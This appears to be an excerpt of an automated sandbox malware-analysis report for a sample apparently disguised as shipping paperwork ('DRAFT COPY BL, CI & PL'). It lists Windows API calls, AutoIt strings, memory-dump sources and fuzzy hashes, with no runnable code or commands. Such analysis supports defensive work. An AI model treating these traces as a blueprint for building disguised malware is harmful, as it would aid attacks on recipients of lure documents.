                                                                • Opcode Fuzzy Hash: 28acecdd45e7dacf6f0febdee30e16c37767f00498e8ca560b2f282d1030f379
                                                                • Instruction Fuzzy Hash: 32F0543A104100BBCF016F95DC85B4ABB29EF85321F048065FE085E267C731E815DBB4
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 00932231
                                                                • SetTextColor.GDI32(?,000000FF), ref: 0093223B
                                                                • SetBkMode.GDI32(?,00000001), ref: 00932250
                                                                • GetStockObject.GDI32(00000005), ref: 00932258
                                                                • GetWindowDC.USER32(?,00000000), ref: 0096BE83
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0096BE90
                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0096BEA9
                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0096BEC2
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0096BEE2
                                                                • ReleaseDC.USER32(?,00000000), ref: 0096BEED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                • String ID:
                                                                • API String ID: 1946975507-0
                                                                • Opcode ID: 4a37d50b39c40b8d9f9ebb631014f5d133d28f93531e08563418828c31a45afd
                                                                • Instruction ID: b11d07ed21bbe6434082475e8532901c41b3c3033606484e06e57f25241161fc
                                                                • Opcode Fuzzy Hash: 4a37d50b39c40b8d9f9ebb631014f5d133d28f93531e08563418828c31a45afd
                                                                • Instruction Fuzzy Hash: 00E03932118244AADF215FA8ED1D7E83B14EB05336F008366FA69980E197B24990EB12
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 0098871B
                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,009882E6), ref: 00988722
                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009882E6), ref: 0098872F
                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,009882E6), ref: 00988736
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken
                                                                • String ID:
                                                                • API String ID: 3974789173-0
                                                                • Opcode ID: f01dc02e420faa28f00c960c9dac5c3cc5127570fdef4d3fff807f33d5749110
                                                                • Instruction ID: 7ee18f415690b391bf0ecb6c1a9dff0d6569cf0f7517e85fb00dcb78a9870aea
                                                                • Opcode Fuzzy Hash: f01dc02e420faa28f00c960c9dac5c3cc5127570fdef4d3fff807f33d5749110
                                                                • Instruction Fuzzy Hash: A7E08636629211ABD7206FB05E0CB5B3BBCEF547E1F144828B245D9050DA348445D760
                                                                APIs
                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0098B4BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ContainedObject
                                                                • String ID: AutoIt3GUI$Container
                                                                • API String ID: 3565006973-3941886329
                                                                • Opcode ID: 8f5b4acd3d70a8f3e831e4ed0372c1e0f4f111ecae3504996127181b37a8733f
                                                                • Instruction ID: 9ab9e9e290d1fab656cfada7575b72fde2ed14d04bb260c9b546d037f82a774b
                                                                • Opcode Fuzzy Hash: 8f5b4acd3d70a8f3e831e4ed0372c1e0f4f111ecae3504996127181b37a8733f
                                                                • Instruction Fuzzy Hash: D1912870600601AFDB14DF65C885B6AB7E9FF49710F28856DF94ACB3A1DB71E841CB50
                                                                APIs
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • __wcsnicmp.LIBCMT ref: 0099B02D
                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0099B0F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                • String ID: LPT
                                                                • API String ID: 3222508074-1350329615
                                                                • Opcode ID: 82a4b04dae4e26757015bab5675a2145b7326d71fc8af104a3fe94db54194109
                                                                • Instruction ID: 07c0b53c783d3127248882c03bd17377c324309b49d3b1c6d1c851e626741a57
                                                                • Opcode Fuzzy Hash: 82a4b04dae4e26757015bab5675a2145b7326d71fc8af104a3fe94db54194109
                                                                • Instruction Fuzzy Hash: 9C618E75A04219EFCF14DF98D991FAEB7B8EF48310F104069F916AB291DB74AE44CB50
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 00942968
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00942981
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemorySleepStatus
                                                                • String ID: @
                                                                • API String ID: 2783356886-2766056989
                                                                • Opcode ID: a59cee8e0386ccfd20097630cddec33a19e266a0b3a065e94ce4179bdd93d0dc
                                                                • Instruction ID: ed7216a524b6583d9aae365640e86f4273b37ce8a126b13f302f65a84ddec40f
                                                                • Opcode Fuzzy Hash: a59cee8e0386ccfd20097630cddec33a19e266a0b3a065e94ce4179bdd93d0dc
                                                                • Instruction Fuzzy Hash: 6D5144724187449BD320EF10DC86BAFBBE8FBC5344F81885DF2D8410A1EB709969CB66
                                                                APIs
                                                                  • Part of subcall function 00934F0B: __fread_nolock.LIBCMT ref: 00934F29
                                                                • _wcscmp.LIBCMT ref: 00999824
                                                                • _wcscmp.LIBCMT ref: 00999837
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$__fread_nolock
                                                                • String ID: FILE
                                                                • API String ID: 4029003684-3121273764
                                                                • Opcode ID: 332c5ed562bee298f4d363d7f94bc93c30ca1c3e20ea4d07093d4eab09becdae
                                                                • Instruction ID: ce71fa33e6c11cc8e1ad3701eb00a76deee6c0156f5ea1a76fd4f567c6df82c4
                                                                • Opcode Fuzzy Hash: 332c5ed562bee298f4d363d7f94bc93c30ca1c3e20ea4d07093d4eab09becdae
                                                                • Instruction Fuzzy Hash: DE41C471A04209BADF219BE9CC45FEFBBBDEFC5714F01046DF904A7181DA71AA058B61
                                                                APIs
                                                                • _memset.LIBCMT ref: 009A259E
                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009A25D4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CrackInternet_memset
                                                                • String ID: |
                                                                • API String ID: 1413715105-2343686810
                                                                • Opcode ID: 946d81b7a82c273f3df639ffeaef0671005acb8a0646b8d62bf667277c44dcb9
                                                                • Instruction ID: 22531c532551eab4b60fa92400d93e3fe4b3f1cf1c274d9bceb5cddc93b6a0f1
                                                                • Opcode Fuzzy Hash: 946d81b7a82c273f3df639ffeaef0671005acb8a0646b8d62bf667277c44dcb9
                                                                • Instruction Fuzzy Hash: 4A3115B1801119ABCF11EFA5CC85EEEBFB9FF49310F10006AF915B6162EA315956DFA0
                                                                APIs
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 009B7B61
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B7B76
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: '
                                                                • API String ID: 3850602802-1997036262
                                                                • Opcode ID: ad22ea3c8a8c19cc5ec464cd20b634750e362f49ecea1c854ebe80356100cfbc
                                                                • Instruction ID: 7d1bacbce29644e19d1e3969df415333ec4070ca930a732fc9fa426cbfa50e72
                                                                • Opcode Fuzzy Hash: ad22ea3c8a8c19cc5ec464cd20b634750e362f49ecea1c854ebe80356100cfbc
                                                                • Instruction Fuzzy Hash: C0411974A053199FDB54CFA4C981BEABBB9FF48310F11026AE905EB391D770A951CF90
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 009B6B17
                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009B6B53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$DestroyMove
                                                                • String ID: static
                                                                • API String ID: 2139405536-2160076837
                                                                • Opcode ID: 0d6d6335734d05870d1dfc5866848014f97683a2ce826d8c09ef2c0f39815b09
                                                                • Instruction ID: ff426f10e1b291819cf478f119e4b07fd2af5b5a4e450e3c3ed8e0f666315124
                                                                • Opcode Fuzzy Hash: 0d6d6335734d05870d1dfc5866848014f97683a2ce826d8c09ef2c0f39815b09
                                                                • Instruction Fuzzy Hash: A1319071110604AEDB109F68CD90BFB73BDFF88760F108619F9A9D7190DA74AC41DB60
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992911
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0099294C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: d1028eb84f058892f4b1260677f1a682194faf18641bb703c39914a208c96169
                                                                • Instruction ID: f633ed6ed32d653ed103e6ecfaa5ccbdb6eb7a5aaac218c3cb300cf7c70e89aa
                                                                • Opcode Fuzzy Hash: d1028eb84f058892f4b1260677f1a682194faf18641bb703c39914a208c96169
                                                                • Instruction Fuzzy Hash: 6531D035A00309BBEF24DF5DDA85BAEBBFCEF45350F140029E985AA2A0D7709948CB51
                                                                APIs
                                                                • __snwprintf.LIBCMT ref: 009A3A66
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __snwprintf_memmove
                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                • API String ID: 3506404897-2584243854
                                                                • Opcode ID: 66bbb6c3e87878c945a091e5b8dbc6f57df2f4a58ead900fd4791f67aa44c343
                                                                • Instruction ID: 013e8e8856261fed918bae3f0f7e8fa99250bdf1bd472efd66aa1e152e72d624
                                                                • Opcode Fuzzy Hash: 66bbb6c3e87878c945a091e5b8dbc6f57df2f4a58ead900fd4791f67aa44c343
                                                                • Instruction Fuzzy Hash: B1217371604229AFCF11EFA4CC82BAEB7B5AF85700F504454F449AB281DB30EA45CFA1
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B6761
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B676C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: Combobox
                                                                • API String ID: 3850602802-2096851135
                                                                • Opcode ID: 31a2b4b6d97d241ef6468ee35884d807918ad8cdafb50ec28025f9aa8ddb0187
                                                                • Instruction ID: 88d751999a3677fb778fdc065fe97c793daacb604b0c85ba000683dc647f8512
                                                                • Opcode Fuzzy Hash: 31a2b4b6d97d241ef6468ee35884d807918ad8cdafb50ec28025f9aa8ddb0187
                                                                • Instruction Fuzzy Hash: 9F11B271210208AFEF219F54CDC1EFB376EEB88378F110129F91497290DA79AC5187A0
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • GetWindowRect.USER32(00000000,?), ref: 009B6C71
                                                                • GetSysColor.USER32(00000012), ref: 009B6C8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                • String ID: static
                                                                • API String ID: 1983116058-2160076837
                                                                • Opcode ID: 7ca7d96159cc70aa5e95e6932355c7d58339c31cc03c294b1fb02ecabeb9fad4
                                                                • Instruction ID: 4cee9158375275bf796fb75e4f994f62db300056a32559bd43389ae02dc92741
                                                                • Opcode Fuzzy Hash: 7ca7d96159cc70aa5e95e6932355c7d58339c31cc03c294b1fb02ecabeb9fad4
                                                                • Instruction Fuzzy Hash: D8215672620209AFDF04DFB8CD45AFA7BA8FB08324F104A28FE95D3250D635E850DB60
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 009B69A2
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009B69B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LengthMessageSendTextWindow
                                                                • String ID: edit
                                                                • API String ID: 2978978980-2167791130
                                                                • Opcode ID: 3e8cae92e81c734d43be1e93695da32b4802e65036557186776ba350a97a0992
                                                                • Instruction ID: 95e3ee1a9628ecead5269cca226d9569368166d362dc376799948d6e1e7a0a19
                                                                • Opcode Fuzzy Hash: 3e8cae92e81c734d43be1e93695da32b4802e65036557186776ba350a97a0992
                                                                • Instruction Fuzzy Hash: 55118F71110208ABEB108E64DE50AFB376DEB45378F504728F9A5971E0C779EC50A760
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992A22
                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00992A41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
                                                                • String ID: 0
                                                                • API String ID: 2223754486-4108050209
                                                                • Opcode ID: 62b26e9e82d89cc029868bc94380e8711c230447442971792dedbaf52e904c08
                                                                • Instruction ID: f25c81008887e7fb698aa26e2a60b9f342ae5329bba4101e30a9de476ec63146
                                                                • Opcode Fuzzy Hash: 62b26e9e82d89cc029868bc94380e8711c230447442971792dedbaf52e904c08
                                                                • Instruction Fuzzy Hash: CD11A933916218BBCF30DB9CD844FAE77ACAB86310F154021EA59A72E0D770AD0AC791
                                                                APIs
                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009A222C
                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009A2255
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$OpenOption
                                                                • String ID: <local>
                                                                • API String ID: 942729171-4266983199
                                                                • Opcode ID: 2fb7e8f2ef2427361427326f6bb781023b8755eb76d66f224ab62c6d1768a976
                                                                • Instruction ID: 1df88ad4cd1cc8afe1ae23a5b54b8a14b9051b22cefb716e36393e459b564f4b
                                                                • Opcode Fuzzy Hash: 2fb7e8f2ef2427361427326f6bb781023b8755eb76d66f224ab62c6d1768a976
                                                                • Instruction Fuzzy Hash: 83110270505225BADB298F598C84FBBFBACFF07361F10862AF92446000D270A880D6F0
                                                                APIs
                                                                  • Part of subcall function 009A7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009A7DB3,?,00000000,?,?), ref: 009A800D
                                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • htons.WSOCK32(00000000,?,00000000), ref: 009A7DF3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                • String ID: 255.255.255.255
                                                                • API String ID: 2496851823-2422070025
                                                                • Opcode ID: ce652d8efe99d4a32fce941c6f4095e5d3a5f45f4f6cfa7e1ba28cb8094bc2b2
                                                                • Instruction ID: fd589bab9667dfea79d3de5a698bcfe0fdcbde6c812a007531fe300057f92d0b
                                                                • Opcode Fuzzy Hash: ce652d8efe99d4a32fce941c6f4095e5d3a5f45f4f6cfa7e1ba28cb8094bc2b2
                                                                • Instruction Fuzzy Hash: DF11A134504209ABCB20AFA4DC86FBEF769FF45320F204A6AF9159B2D1DB71AC11D794
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933C14,009F52F8,?,?,?), ref: 0094096E
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _wcscat.LIBCMT ref: 00974CB7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
